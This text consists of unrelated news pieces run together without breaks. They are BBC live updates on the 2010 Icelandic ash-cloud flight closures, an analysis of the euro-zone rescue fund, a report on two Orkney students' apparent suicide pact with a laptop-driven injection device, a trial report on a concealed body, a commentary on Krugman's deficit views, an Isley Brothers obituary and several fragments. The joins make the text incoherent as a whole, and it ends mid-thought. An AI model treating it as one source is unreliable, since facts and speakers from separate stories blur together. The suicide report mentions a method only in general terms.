1456 Restrictions on flying in a large part of Scotland and Northern Ireland will be lifted from 1900 BST ( 1800 GMT ) on Friday , Nats says .
1450 The UK's Air Traffic Control Service ( Nats ) says restrictions on all flights in and out of England and Wales will remain in place until at least 0700 BST ( 0600 GMT ) Saturday .
1446 The BBC's Matthew Price at JFK airport in New York : I know Delta cancelled about 65 of their flights yesterday , and American Airlines about 35 .
I am estimating from the figures that I 've seen that about half of those US carrier flights have been cancelled .
Certainly , the departure and arrival boards at Terminal Four here , which Virgin fly into and out of , show cancellations .
There is a flight scheduled to come in from Dublin , so some transatlantic crossings are making it , but the majority of them are shut down .
1439 Eurocontrol 's Brian Flynn warns of significant disruption again on Saturday .
1434 Eurocontrol , Europe 's air traffic agency , holds a press conference in Brussels .
Deputy Head Brian Flynn says passenger movements across Europe dropped by 50 % on Friday .
1421 BBC correspondent Hugh Schofield in Paris :
All flights out of Charles de Gaulle , Orly and all airports north of Paris are grounded until 2000 local time ( 1800 GMT ) on Friday .
Staff at Charles de Gaulle say the closure is likely to continue overnight , he adds .
Airspace south of Paris remains open .
1415 xoLauraF tweets : Iceland need to get themselves a giant cork and fix this volcano business .
I had plans for tomorrow !
Read xoLauraF 's tweets 1413 UK taxi company Addison Lee reports receiving requests for journeys to destinations as far away as Paris , Milan , Amsterdam , Zurich and Salzburg .
1408 Danish airspace will remain closed until 0800 local time ( 0600 GMT ) on Saturday , says Danish Navair aviation authority .
1406 Finland announces the grounding of all commercial flights until 1500 local time ( 1200 GMT ) on Sunday .
1400
Only one of three planes without passengers due to have taken off from Manchester Airport during a one - hour window were able to take off .
The departing plane is due to return stranded passengers from overseas .
1354 The impact of the airspace closure could cost the UK economy more than £ 100 m a day , says BBC business correspondent John Moylan .
1344 Paul Taylor , in Hersham , Surrey says :
In 1989 we were flying on a brand new KLM 747 to Tokyo via Alaska when we flew into a volcanic cloud over Anchorage .
All four engines stopped and we fell around 10,000 feet before the pilot got one engine working and another just before an emergency landing .
Having been through that , I can see why Nats are not taking any chances .
1337 Brian Flynn , of pan-European air traffic controllers Eurocontrol , said the latest forecasts were " showing there 's still extensive volcanic ash present up to two o'clock tomorrow morning , and considering the behaviour of it up to now , and the light winds that there are in Europe , at the moment it would not be expected to dissipate quickly " .
1328 Emma , of London , writes : I am stranded at Doha airport after a 14 - and - a - half - hour flight from Melbourne .
We have been here for eight hours and have been told that we are n't a priority by Qatar Airways and that there are 500 people getting hotel beds before us , let alone a flight to the UK .
Looks like we could be here for a while .
1324 UK Transport Secretary Lord Adonis predicts that " significant disruption to most UK air services will continue for at least the next 48 hours " .
He added : " My advice to passengers is to contact their airlines .
All EU carriers and any airlines operating out of EU airports are obliged to offer passengers either a refund or a re-route , which can include travel by other means , where available . "
The Civil Aviation Authority was closely monitoring whether those obligations were being met , the minister said .
1317 Fiona Atay in Worcestershire says :
We are stranded in Istanbul .
At present the only " definite " flights we are entitled to will be on Wednesday 21st - if planes are back in the air and flying to UK .
We are lucky as we have an apartment to which we have returned ; I have no idea what happened to the two full plane - loads of UK Stansted travellers who were turned back just from Istanbul 's lesser airport , Sabiya Gokcen !
1311 johl tweets : Just like Bjork , volcano ash is a typically Icelandic export : awesome at first , but gets boring rather quickly .
Read johl 's tweets 1306 The UK's air traffic control service , Nats , to announce the status of Saturday 's scheduled flights at about 1430BST .
1301 P&O Ferries , which operates routes between the UK and mainland Europe , says it is unable to accept any further foot passenger bookings before Monday " as a result of the unprecedented surge in demand due to the airline crisis " .
1300 Melvin Wilson in Tenerife says :
We were meant to fly back from Tenerife tonight , but they are turning people away from the airport .
There is no one to talk to and all the phone lines we ring just tell us to try later and hang up .
No one seems bothered at the moment about people stuck elsewhere , just those not able to leave the UK .
We have had no provision made to us by the airline since we cannot get into the airport and have had to book a hotel .
Our airline website says rebook , but the next flight is NEXT Friday .
If alternate provision will be made midweek we have no idea , we are totally cut out of the information loop .
1258 A rescue helicopter has been flown through clouds of volcano ash to help a woman on Shetland in a " life or death " situation .
The woman is receiving hospital treatment in Lerwick after being transported by the Shetland Coastguard helicopter crew .
1256Jonny H in Singapore says : Just had my flight to Heathrow cancelled and been told it could be 10 days before I get on another one !
Wonder if volcanic ash cloud counts as a mitigating circumstance for Uni .
1254 A British atmospheric research team has gathered speed and direction data from the edge of the volcanic ash plume .
A specially - adapted small plane was used to collect readings on Thursday , after taking off from Gloucestershire Airport at Staverton .
1251 The family of the late Polish President Lech Kaczynski want the funeral to go ahead as planned on Sunday , even if global leaders are unable to attend because of the travel disruption , Polish presidential aide Jacek Sasin says .
1229 BBC correspondent Hugh Schofield , at Charles de Gaulle Airport in Paris : " Eerie silence in the skies of course , but strangely busy in the airport - the message clearly has n't got out to everyone that the airport is shut , that airspace is closed .
There are people turning up still in , it seems , quite large numbers .
" There is a long queue at the Air France desk - a lot of people apparently coming because they have been calling up Air France , the numbers are completely engaged , they do n't know what 's happening .
So they have actually come out to get information from the desks here .
" Others , of course , who arrived yesterday found it shut and have stayed ever since .
But some people still arriving , hoping for flights that just are n't going to happen . "
1213 British Prime Minister Gordon Brown , speaking to BBC Sussex radio , apologised for the inconvenience caused by the closure of UK airspace .
" I think it is partly to be absolutely sure about people 's safety , " he said .
" We are looking at it virtually every hour to make sure we get the best meteorological advice , and give passengers the best advice . "
1204 More information about the three flights due to depart from Manchester Airport between 1200 and 1300 BST :
The first is a Thomson flight to Barbados , followed by two Thomas Cook departures to Vancouver in Canada , and Cancun in Mexico .
The planes are departing empty because there is no time to load passengers in the hour available , but they are due to bring back stranded holidaymakers .
1200 Retinus Roux in Reykjavik tells the BBC geologists are now testing the ash from the volcano .
Too much flourite in the ash could be dangerous to livestock and there are concerns the ash could cause problems for people with respiratory diseases , he says .
" We have great concern for the farmers around the mountain and the people in the villages nearby ( Hvolsvöllur and Vík ) , both because of the danger from the ash and flooding . "
1157 Airline Manx2.com is operating up to seven flights from Blackpool to the Isle of Man , on to Belfast then back .
The small 19 - seat propeller - driven aircraft fly at a lower level than jets .
1156 A team of UK scientists is preparing to send a plane to take readings around the edge of the volcanic ash plume .
The findings of the Natural Environment Research Council 's Airborne Research & Survey Facility , based in Wiltshire , will help guide Met Office forecasts and advice to airports .
1155 Three planes are due to take off from Manchester Airport , without passengers , during a one - hour window to move aircraft .
1143 twmercer tweets : Honestly .
If you can't look after your volcano you should n't be allowed to keep one .
Read twmercer 's tweets 1141 Dr Matthew Roberts , a glaciologist at the Icelandic Met Office , has flown over the volcano responsible for the ash cloud .
There 's a lag effect between material being emitted from the volcano and the ash plume drifting into European airspace
Dr Matthew Roberts
Icelandic Met Office
" The situation as it stands this morning is that the eruption continues .
It seems to be quite stable .
There have n't been any further significant outbursts of volcanic ash from the eruption site , " he said .
" However , as you know , there is still volcanic ash in the atmosphere and there 's a lag effect between material being emitted from the volcano and the ash plume drifting into European airspace .
So , the material that 's in the sky at the moment was ejected on 14 April and currently there is n't any new material leaving the eruption site . "
1138 Malcolm McDade in Reading says :
My daughters are stuck in Mumbai and Kingfisher Airlines have told them it could be May before they get back to the UK .
1133 BBC Scotland correspondent Colin Blane , at Glasgow Airport :
He said there had been two arrivals and one departure from the airport on Friday morning .
" For a little while , just for a few minutes , this place began to feel like an airport should .
There were holidaymakers coming back with their sunglasses still on .
There were kids wearing the clothes that they had had on the beach , still with their suntans .
It felt like an airport should , but it is by no means back to normal . "
He added that one of the arriving flights had been diverted from its destination at Gatwick , meaning passengers still faced a nine - hour bus journey .
1128 pjesi tweets : Sorry Europe for the flight delays while we recharge our thermal energy batteries .
Read pjesi's tweets 1127 Scottish First Minister Alex Salmond tells the BBC there is an " improving situation " over Scotland and he is hopeful that Scottish airspace will open later .
He says internal flights - to the islands - are now moving , and hopes transatlantic flights will also be able to operate later .
Mr Salmond said Glasgow and Prestwick airports may also be able to receive flights diverted from landing in other parts of the country .
1105 Cornwall Air Ambulance says it has grounded its helicopter as a precaution , because damage to the vehicle would put the service out of action for a longer period of time .
Meanwhile , flights to and from the Isles of Scilly are unaffected because they are carried out at 1,500 ft - below controlled airspace .
1101 Poland 's Krakow airport has been closed to regular flights .
It is due to receive most of the world leaders flying in to attend the funeral of Polish President Lech Kaczynski on Sunday .
A presidential official has said delaying the funeral is a " last resort " .
1056 Bob Atkinson , of UK price - comparison website Moneysupermarket.com , calls the reaction of travel insurers to the flights disruption " extremely disappointing " .
Insurers must not use their small print to try and wriggle out of this one
Bob Atkinson
Moneysupermarket.com
" I have spoken to several main providers this morning and , over 24 hours into this incident , the majority still have n't developed a position on how they will handle any claims for cancelled and delayed flights and any other monetary losses . "
He added : " This is exactly the type of event that customers buy insurance for and they should be able to claim for the cost of their lost holidays and costs that they incur .
Insurers must not use their small print to try and wriggle out of this one . "
1033 The Duchess of Cornwall is unable to fly from Scotland and cancels a visit to a Polish cultural centre in London , where she had been due to sign a book of condolence for the late President Lech Kaczynski .
1032 Laumb tweets : I have ash from the Icelandic volcano on my car .
And I live in Norway !
Sick !
Read Laumb 's tweets 1023 The Port of Dover says ferry operators made arrangements during the night to take additional foot passengers , after being inundated with enquiries from travellers unable to make journeys by air .
" Our contingency plans were swiftly implemented in order to provide the best service we can to them , " said port boss Bob Goldfield .
1019 Paris Charles de Gaulle airport will remain closed until at least 1800 GMT , the AFP news agency reports .
1016 Paul from Oberwil , Switzerland , says : Never mind international hen parties and baby showers , I 'm supposed to be flying from Switzerland to support Sheffield Wednesday against Sheffield United at the weekend - they need me , it 's not looking good .
1014 Manchester Airport says 950 flights in and out of the airport will be disrupted during the current flights restriction up to 0100BST on Saturday ( 2400 GMT ) .
It says this will affect in the region of 150,000 passengers .
1012 Shares in major European airlines have fallen as thousands of flights are grounded across the continent .
British Airways shares are down almost 1 % in the first hour of trading .
1009 Carly Mitchell , of Powys , has spent most of the last 24 hours at Manchester airport .
She told the BBC News website : " We got to the airport at 6 am on Thursday and have n't really been told what 's been going on since then .
We 're due to fly to Dalaman , in Turkey , but we keep getting told different things .
Yesterday we were told it would be a few days until we could go , then we were told to come back this morning .
" We stayed in a hotel last night but have been mainly at the airport .
It 's very frustrating . "
1008 Leeds Bradford Airport says it is working closely with airlines to plan extra services once UK airspace opens .
All flights from the airport on Friday are cancelled .
More than 4,000 passengers on more than 50 flights are affected .
1007 Alex from Geneva , Switzerland , says :
Am supposed to be flying to Luton tomorrow so I can start back at uni on Monday .
Does n't look like I will be handing my essays in on time .
1005 The number of Eurostar services sold out between London and Paris and Brussels is revised to 58 .
A spokeswoman says they are carrying more than 46,000 people and all the trains are full .
0956 Ferry firms in Wales say they are benefiting from disruption to flights out of Cardiff .
Both Stena and Fastnet Line have reported a significant increase in bookings for ferries to Ireland .
0954 Allan from Croydon says :
We are in Sydney , due to fly back to Heathrow via Kuala Lumpur Saturday morning .
Calls just go unanswered despite being a valued customer !
So many questions and no - one to ask !!
0952 Brian Golding , Met Office head of forecasting , says it it is hard to say how long flights could be affected by the problem .
" At the moment , the ash over the UK is n't going anywhere very fast and so there is a problem , " he told BBC News .
" But as it gets older , that existing old ash will become less of a threat .
But if new ash comes down from Iceland over the next day or two then the threat will be renewed . "
0951 Allan Stevenson from Edinburgh says : Four of us were due to fly home from Amsterdam this morning at 1030 .
Ca n't see any flights taking off soon .
We have just booked onto tomorrow 's ferry to Newcastle and a taxi from there home to Edinburgh !
0948 Eurostar reports its 48 services between London and Paris and Brussels on Friday are sold out .
" We are carrying more than 38,000 people today and all our trains are full , " a spokeswoman said .
" We are telling potential customers without bookings not to come to St Pancras because they will not be able to travel . "
She added : " We expect to be very busy over the weekend as well . "
0947 Polish presidential official Jacek Sasin says delaying Sunday 's funeral for President Lech Kaczynski would be a " last resort " and there are no such talks on the issue .
Earlier , he said a delay was possible .
All but two of Poland 's airports are closed .
0938 Debbie Eidsforth , 36 , was stranded overnight at Heathrow Airport awaiting a flight to Australia :
It does n't matter what class you fly in , everyone 's in the same situation .
I just slept here on the seats , and there were quite a few other people dotted around .
They should really have brought blankets and coffee around for us .
At the end of the day , this is nobody 's fault but it 's very frustrating when there 's no communication .
0936 Despite a small number of flights being permitted into and out of Northern Ireland and western Scotland , Nats says that the only flights running out of Northern Ireland are a limited number to the Isle of Man. 0930 PeterHoffer tweets : Sorry Iceland , your volcano is costing you valuable votes for Eurovision .
Read PeterHoffer 's tweets 0927 Pamela Bowy , at Paris 's Roissy airport , tells the BBC : " We came from Johannesburg yesterday morning at 6 o'clock in the morning and we have been here since then .
We are trying to get back , our first flight at the moment is Monday morning , back to Birmingham .
We are with our family - there is six of us , we are trying to see if we can get a train . "
0923 andywhittle tweets : Advice on the radio this morning concerning the Icelandic volcano : Breathe less .
Read andywhittle 's tweets 0921 The Czech air authority says it has closed the airspace in the north of the country and is expected to halt flights at Prague airport from 1000 GMT .
The country 's entire airspace could close from 1100 GMT , it warns .
0918 Russia 's Emergencies Ministry says the volcanic ash cloud poses no danger to Russia and its population , Itar - Tass reports .
0913 Jack , in London , says : I was supposed to be flying to Prague today to make a surprise visit to the girl I love , to tell her I love her .
Many things have prevented me from doing this in the past ( pride , faintheartedness , lack of opportunity ) but a volcanic eruption ...
You could n't make it up .
0908 Kalinda from Singapore says : About 2,000 passengers travelling to Germany , France , the UK , and the Netherlands are stranded here in Singapore .
They are unable to accommodate anyone here due to " the critical hotel situation in Singapore " and therefore passengers have had to sleep in the terminals with just a few thin blankets .
They are offering food , and we are now just " being patient until further information is received " .
There are some very frustrated people here !
0907 Jules in Stockholm says : The Swedish national rugby team got grounded and had a mad rush to get the ferry to Latvia for an international game .
Mad !
Five British - based players , including the captain , are stranded in London .
0904 OdaRygh tweets : Mmm ...
I love the smell of sulphur in the morning !
Read OdaRygh 's tweets 0857
The first plane to leave UK airspace since its closure on Friday left Glasgow airport at 0755BST , the airport has announced .
The Air Transat service is bound for Toronto .
But airport managing director Amanda McMillan says the departure is not a sign that things are getting back to normal , with the cost to the industry running at millions of pounds .
0856 A Polish official says delaying Sunday 's funeral for President Lech Kaczynski and his wife is a " serious alternative " if Polish airspace remains closed .
US President Barack Obama and dozens of other world leaders are due to fly in for the funeral in Krakow .
0850 UK Met Office update advises that " dust and smells have been detected in the Northern Isles " from the Iceland volcano eruption .
It is liaising with Health Protection Scotland and the Health Protection Agency in England .
Dust has been collected at Lerwick and is currently being analysed by the Scottish Environment Protection Agency , the Met Office says .
0844 Ashaiscool tweets :
For the record , no Milan for me this weekend ... work and life and a volcano ensured that :)
Read ashaiscool 's tweets 0843 Jurgen Brieger from Milton Keynes says : I am due to fly to Tenerife from Birmingham on Tuesday .
Whilst I am pretty optimistic about the airport being open again by then , I am concerned what the knock - on effect for airlines will be .
0842 European air traffic disruption will last at least another 24 hours , European aviation control agency Eurocontrol says .
In a statement , it says it expects some 11,000 flights in European airspace on Friday compared with 28,000 normally .
0838 Denmark expects to keep its airspace closed until at least midnight GMT Saturday , Navair aviation authority says .
0834 Austrian airspace will be closed from late afternoon , Reuters news agency reports .
0833 Norway 's airport authority says it has resumed limited flights from Trondheim in the northern part of the country .
0830 Nats advises that restrictions preventing flights in English - controlled airspace will remain in place until 0100BST on Saturday .
The Nats statement continued : " Flights in Northern Ireland and the Western Isles of Scotland to and from Glasgow and Prestwick will continue to be allowed until 1900BST ubject to individual co-ordination .
North Atlantic traffic to and from Glasgow , Prestwick and Belfast may also be allowed in this period .
" From 1900BST , forecasts indicate that Scottish airspace may be able to accept domestic flights within Scotland and Northern / Southern Ireland , and North Atlantic flights to / from airports in Scotland and Northern Ireland . "
Nats said it would review Met Office information and give a further statement at 1330BST .
0822 Lithuania shuts its airspace , AFP reports .
0820 Thousands of flights across much of Europe remain cancelled for a second day .
The UK's Air Traffic Control Service ( Nats ) is due to make a statement at 0830 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
FOR weeks there have been calls for the euro zone 's policymakers to get ahead of the sovereign - debt crisis , which started in Greece and was in danger of engulfing other countries with big budget deficits and poor growth prospects .
In the early hours of May 10th , such a plan finally emerged .
After a lengthy summit in Brussels , European finance ministers agreed on a “ stabilisation fund ” worth up to €500 billion ( $ 640 billion ) over three years .
That sum would be supplemented by a further € 220 billion or more from the IMF .
In addition , the European Central Bank ( ECB ) said it would purchase government bonds to restore calm to “ dysfunctional ” markets .
The market response was euphoric .
Germany 's stockmarket had risen by more than 5 % when it closed on May 10th .
The CAC 40 , the main index in France , was up by almost 10 % : big French banks are heavily exposed to Greece , so they stand to benefit from a cast - iron rescue package .
The yield on ten - year Greek government bonds plunged from more than 12 % to less than 8 % .
The yields on comparable bonds for Portugal , Spain , Italy and Ireland also fell sharply .
The euro rose a bit against the dollar .
Markets had become sceptical that Europe could respond with enough scale and speed
The response is a sign of how sceptical markets had previously been that Europe could respond to the deepening crisis with enough scale and speed .
Even so , the rescue plan has a patched - together feel to it .
One part is based on an existing € 50 billion fund for non-euro countries with balance - of - payments problems , which is financed by European Union bonds that can be sold fairly quickly .
The EU is to create a similar , € 60 billion fund for euro member countries — as much money as could be raised without breaching its budget ceiling .
This proposal had to be signed off by countries , like Britain , which do not use the euro , because their taxpayers would also be on the hook were the money not paid back in full .
The mainstay of the rescue fund , an additional € 440 billion if needed , will come from a new vehicle to be set up by the 16 euro - zone countries , which will control the money disbursed by it and guarantee its financing .
Details on how this would work are sketchy but an EU official said the scheme could be enacted in a week or two .
The IMF is expected to chip in with funding worth at least half as much again .
The ECB 's participation was vital
These elements of the rescue plan satisfy the need for a big response but would take a while to be fully operational — too long , perhaps , for jittery financial markets .
That is what made the ECB 's participation so necessary : it is the only institution that can react rapidly enough .
Market chatter suggests that much of the fall in European bond yields on May 10th was down to the ECB , already in the market , buying bonds .
Doing this has the effect of pumping cash into the economy but the bank says it will " sterilise " this by other means ( such as selling instruments of its own , to soak up the cash ) , so that monetary policy will not be loosened .
Jean - Claude Trichet , the central bank 's head , denied that the bank had been pressured into buying bonds , even though it is only a few days since he said publicly that the ECB 's governing council had not even discussed buying bonds at its regular monthly meeting .
He insisted that the ECB was “ fiercely and totally independent . ”
The ECB looks a different animal to when the fiscal crisis began
However , for all his protestations , the ECB looks a different animal to when the fiscal crisis began .
Having balked at buying government bonds last year when other central banks were doing so as part of their monetary policy , the bank now finds itself involved in an explicit support operation to European governments ' fiscal policies — which is a far bigger threat to its self - image .
This is not the only sharp U - turn Mr Trichet has had to perform in recent weeks .
He opposed IMF involvement in the Greek rescue , then welcomed it .
And he said the rules would not be changed to suit one country , only to change them to ensure that Greek bonds could be exchanged by banks for ECB cash .
The central bank 's credibility relies in part on a reputation for living up to its pledges and partly on its disdain for political expediency .
On both counts , then , it has lost something .
Even so , it is wrong to conclude that , in trying to get ahead of the crisis , the euro zone 's policymakers have gone too far .
The threat that Portugal and Spain might be cut off from credit markets , triggering a meltdown in Europe 's financial system , was all too real .
The rescue effort will dent the ECB 's reputation as a single - minded inflation - slayer .
The insurance provided by the rescue scheme may leave countries that benefit from it a bit less minded to cut deficits and reform their economies .
But those faults , real as they are , must be set against the potential costs of doing nothing .
‘ Suicide by laptop ’ riddle of two brilliant students found dead in hotel room
Two brilliant university students were found dead together in a hotel room after apparently rigging up a laptop to deliver lethal injections in what is thought to have been a suicide pact .
Friends Robert Miller , 20 , and 19 - year - old James Robertson – both described as highly intelligent – were found slumped in chairs .
Their bodies were discovered facing each other at the £ 65 - a- night Ramada Jarvis Hotel in Ayr – 80 miles from where they were both studying for joint maths and physics degrees at Edinburgh University .
Grim discovery : The Ramada Hotel where the pair were found slumped in chairs
Staff entered the room after becoming concerned that the young men had n’t checked out .
The tragedy has raised fears the pair were influenced by Australian doctor Philip Nitschke , dubbed Dr Death , inventor of the so - called ‘ Deliverance Machine ’ .
Pro-euthanasia campaigner Dr Nitschke ’s device involved a computer connected to a syringe driver which could deliver a lethal dose of medication at the touch of a button .
It killed four terminally ill Australians before being outlawed in 1997 .
The students ’ deaths have sent shockwaves through the remote Orkney communities where they were raised .
A friend , who asked not to be named , said : ‘ No one can understand why this has happened .
They were just boys next door – good fun and good friends to have . ’
Bright future : Orkney lad James Robertson was a gifted musician as well as a top class maths and physics student
Mr Robertson had attended Stromness Academy , while Mr Miller , who was just days away from his 21st birthday , went to Kirkwall Grammar on the other side of the Orkney mainland .
However , Mr Miller ’s page on social networking site Facebook shows that they shared mutual friends .
They had arrived at the seafront hotel on Tuesday and were said to have been ‘ happy and chatty ’ when they spoke to staff .
When they did not appear back at reception the next day , staff made the grim discovery .
Strathclyde Police examined the laptop and said they are not treating the deaths as suspicious .
Tragic ending : Highly - intelligent Robert Miller was found dead with fellow student
Mr Robertson was a gifted musician known as Jim .
Last night , the mother of one of his friends said no one had any idea what had caused the pair to take their lives .
She said : ‘ Jim was just the nicest , sweetest boy and everyone is in total shock .
He played in a band and was a very good guitarist .
He was a gentle soul and always looked out for his friends .
But he had a dry sense of humour too and liked a joke .
‘ He decided to go off to study in Edinburgh as many of the young folk here do .
He was highly intelligent , with an exceptional grasp of numbers , so it seemed the right step .
This has just come like a bolt out of the blue . ’
Mr Robertson used to be in an indie-rock band in Orkney called Feedback .
He played a number of instruments but specialised in the guitar .
His devastated parents Barbara and William , of Stromness , travelled to the mainland after their son ’s body was discovered .
Mr Miller ’s parents , James , and Christine , from Finstown , also made the journey to Ayrshire .
Both families are well known in the community .
Mrs Robertson works with charities and voluntary groups .
Mr and Mrs Miller are directors of the Orkney Media Group , which owns the newspapers The Orcadian and Orkney Today .
They had the heart - breaking task of identifying the two men ’s bodies and it is understood they are now making arrangements to have their sons ’ remains transported back to Orkney .
Last night , Stromness councillor Ian Johnston said : ‘ Nobody has any idea what is behind this and we are absolutely shattered .
I knew Jim .
He was in the same year at school as my own son , so it has hit my family hard as well .
‘ They will be very badly missed by the community . ’
Edinburgh University has been helping police piece together any motive the pair might have had for taking their own lives .
There has been growing concern about the availability of suicide ‘ self - help ’ guides .
Critics have said they are a rich hunting ground for predatory intruders seeking to exploit the vulnerable .
Nicola Peckett , of the Samaritans , said : ‘ Suicide is a complex issue and is not usually the result of just one factor or event .
It is very important not to let your feelings spiral out of control and to seek help when you do n’t feel able to cope . ’
The Samaritans can be contacted on 08457 90 90 90 or by emailing jo@samaritans.org
Catholic churchgoers are being asked to make extra contributions to their local weekly collection to help fund the Pope 's visit to Britain in September .
What 's your reaction ?
The Papal visit will cost £ 15 m , not including extra policing and security , most of which will be spent on three open - air masses which the Church says could attract up to 400,000 people in total .
The Church 's share of the cost is £ 7 m , and with slightly less than half of it raised , congregations are being asked to contribute via the collection plate .
Have you made an extra contribution at your local collection ?
Should taxpayers be expected to pay for the Pope 's state visit ?
Is sharing the cost with the Catholic Church a good idea , or should the church cover the entire bill ?
This debate is now closed .
Thank you for your comments .
Heather Stacey was living in Granton in Edinburgh before she disappeared A man accused of murdering a mother - of - four has admitted hiding her body for about a year before chopping her up and leaving pieces in bags in Edinburgh .
Alan Cameron , 56 , from Edinburgh , denied that he murdered Heather Stacey , 44 , at her flat in Granton , between end of November and mid December 2007 .
He admitted he failed to report her death and concealed her body at Royston Mains Place , Granton , for 13 months .
The case started on Monday at the High Court in Livingston .
Mr Cameron admitted he cut and sawed the limbs from Ms Stacey 's decomposed torso , wrapped her body parts in bags and covers , and took and dumped her remains near Hawthornvale Path in Newhaven , Edinburgh , and other areas of nearby Granton .
He also admitted that over 11 months between November 2007 and October 2008 he made repeated withdrawals from her Post Office card account .
The case at the High Court in Livingston is to last about two weeks
He admitted convincing the benefits authorities she was still alive , and induced them to continue to pay out disability living allowance , income support and tax credits totalling nearly £ 5,000 in her name .
He said he sent a text purporting to be from her and over five days in December 2007 repeatedly pretended she had phoned him .
In a list of charges , running to three pages , handed to the jury of eight women and seven men at the High Court in Livingston , the way in which Ms Stacey sustained her fatal injuries in the alleged assault was described as " unknown " .
Advocate depute Alex Prentice QC refused to accept Cameron 's pleas of not guilty to murder , but guilty to attempting to defeat the ends of justice , and theft .
Giving evidence , Heather 's daughter Danielle Williamson , 23 , who grew up with her mother in Dingwall , and has a brother Mark , as well as a younger brother and sister , said her mother had moved to the flat in Royston , Edinburgh , in 2007 , and had a drink problem .
The trial before Lord Matthews continues .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Finding a new doctor ( especially if you need a specific specialty ) is pretty difficult , especially if you have no recommendations to guide you .
Web service Doctor Finder 's searchable database of detailed patient reviews can help you find the right one .
Advertisement
The search engine is pretty easy to use , and even has a few more detailed options to help you out , like filtering by specialty and insurance .
You can search up to 20 miles away , specify a gender , and even how much experience they have .
By default , Doctor Finder sorts your results by the best reviews first , and then by number of reviews , so you can be sure one of the first few on the list is a pretty good pick ( though you can read all the reviews to be sure ) .
Advertisement
The are a lot of reviews available on the site ( most of which seem to be pulled from CitySearch ) , which is nice .
They do n't have reviews for all of the doctors in a given area , but it does have a pretty good number of them , and again — if you have no recommendations to go off of , this is way better than just picking one at random from your insurer 's list .
Doctor Finder [ via Wired ]
Some actors called it " judging , " as in " I judged last week , " a verb meaning , " to play a judge on ' Law & Order . ' " Donna Hanover , a broadcast journalist and ex-wife of former New York City Mayor Rudolph Giuliani , judged seven times .
Humorist Fran Lebowitz donned the robes on 12 occasions .
" To be part of that judge pool , it 's an honor , " says Stephen McKinley Henderson , who played Judge Marc Kramer on seven episodes over the last 15 years and is also a Tony nominee this year for " Fences . "
To ...
Usually when they call macroeconomics the dismal science , they 're paying the field the compliment of pretending it 's a science .
But what if leading economists are as susceptible as politicians or journalists to basing their pronouncements not on research but on party affiliation ?
In Econ Journal Watch , George Mason University economics student Brett Barkley tries to quantify how likely economists are to change their tune based on whether the Silly Party or the Sensible Party is in power .
He focuses on what may be the central fiscal question of the age : Does an economist change his or her view of deficit spending when political power shifts ?
Large budget deficits represent a burden on the future , and debt accumulation eventually poses great problems .
Economists writing for the public can either highlight such truths , neglect the issue , or try to allay worries or excuse or justify large budget deficits ( as anti-recession policy , for example ) .
Economists affiliated or aligned with one of the parties may be suspected of changing their positions on budgets deficits to serve their favored party or win favor with its constituency .
Barkley 's finding is that of 17 prominent economists surveyed , six showed evidence of shifting their views on deficits when power shifted , and the most significant changes came in the prognostical pontifications of New York Times columnist Paul Krugman — the Nobel Laureate , 2002 E&P columnist of the year , and three - time winner of the CableACE award :
Barkley opposes Krugman 's deficit hawkishness during the two Bush administrations with his calls for more deficit spending during the Clinton and Obama administrations ( and also after the Democrats took control of Congress in 2006 ) .
In some cases , his willingness to keep going deeper into debt has put him at odds even with the politicians he supports , as it did during the debt - reduction period late in Bill Clinton 's presidency , and in some strident columns urging Barack Obama not to go wobbly on deficit concerns :
While the administration was beginning to question the efficacy of fiscal stimulus in light of increasing deficits , Krugman argued that with such high unemployment and impending elections no viable option was left but to increase deficit spending .
Krugman 's main concern seemed to be winning elections and he feared that Obama 's " centrist " tendencies would impede such an agenda by giving in to deficit reduction …
Whole study [ pdf ] .
In general I do n't pay much attention to Krugman 's phantasmagorical philosophizing , but I 'm not sure Barkley 's methodology makes that strong an indictment .
He tabulates comments made at by his subjects at various points , and not surprisingly , Krugman 's comments are more voluminous than anybody else 's .
In fact , if you count up the references , there seems to be a very strong correlation between the number of citations he has for a given economist and the economist 's tune - changing , with Krugman and Alan Blinder having both the highest degree of changeability and the highest number of references used .
Nor is there definitely a contradiction between changing your tune by party politics and being a true believer of the drink - yourself - sober school of fiscal management Krugman advocates .
It 's in the nature of Keynesianism to believe not just that the economy needs to be managed , but that it needs to be managed by the right sort of fellows .
Krugman himself addresses this notion in a ramble about the difference between good deficits and bad deficits :
Broadly speaking , there are two ways you can get into severe deficits : fundamental irresponsibility , or temporary emergencies .
There 's a world of difference between the two .
Consider first the classic temporary emergency — a big war .
It 's normal and natural to respond to such an emergency by issuing a lot of debt , then gradually reducing that debt after the emergency is over … Consider , on the other hand , a government that is running big deficits even though there is n't an emergency .
That 's much more worrisome , because you have to wonder what will change to stop the soaring debt .
In such a situation , markets are much more likely to conclude that any given debt is so large that it creates a serious risk of default .
Now , back in 2003 I got very alarmed about the US deficit — wrongly , it turned out — not so much because of its size as because of its origin .
We had an administration that was behaving in a deeply irresponsible way .
Not only was it cutting taxes in the face of a war , which had never happened before , plus starting up a huge unfunded drug benefit , but it was also clearly following a starve - the - beast budget strategy …
Compare and contrast the current situation .
Most though not all of our current budget deficit can be viewed as the result of a temporary emergency .
Revenue has plunged in the face of the crisis , while there has been an increase in spending largely due to stimulus and bailouts .
None of this can be seen as a case of irresponsible policy , nor as a permanent change in policy .
It 's more like the financial equivalent of a war .
This reminds me of how my dad assured me he would beat his cancer because it was the good kind of cancer , not the bad kind .
Then it turned out it was actually the bad kind of cancer , and he died .
Certainly it 's worse to have money committed on a permanent basis than it is to have the option of paying or not paying each year .
But ultimately , every dollar you spend on credit has to be paid back with interest by somebody .
Krugman 's willingness to change his tune on deficit spending when it's the Democrats doing the spending is unseemly .
But his honest belief — an astonishingly cavalier approach to deficit spending — is worse than his partisan positioning .
( CNN ) -- Marvin Isley , youngest member of the soulful Isley Brothers R&B group , has died from complications with diabetes , hospital officials said Monday .
He was 56 .
Isley passed away Sunday morning at the Seasons Hospice within Weiss Memorial Hospital in Chicago , Illinois , according to representatives at both facilities .
The original group formed in 1954 with the three eldest brothers Isley -- O'Kelly Jr. , Rudolph and Ronald -- which recorded several singles , including " Shout , " " This Old Heart of Mine " and the Grammy - winning " It 's Your Thing . "
Marvin Isley joined in 1973 , when the group expanded to six performers .
The full group enjoyed massive radio airplay with lists of hits , including " That Lady , " " The Heat is On , " " Go For Your Guns " and " Fight the Power . "
The Isley Brothers were inducted into the Rock and Roll Hall of Fame in 1992 .
Marvin retired from performing five years later , and eventually diabetes led him to have both legs amputated .
It is fashionable among environmentalists today to paint a gloomy portrait of our future .
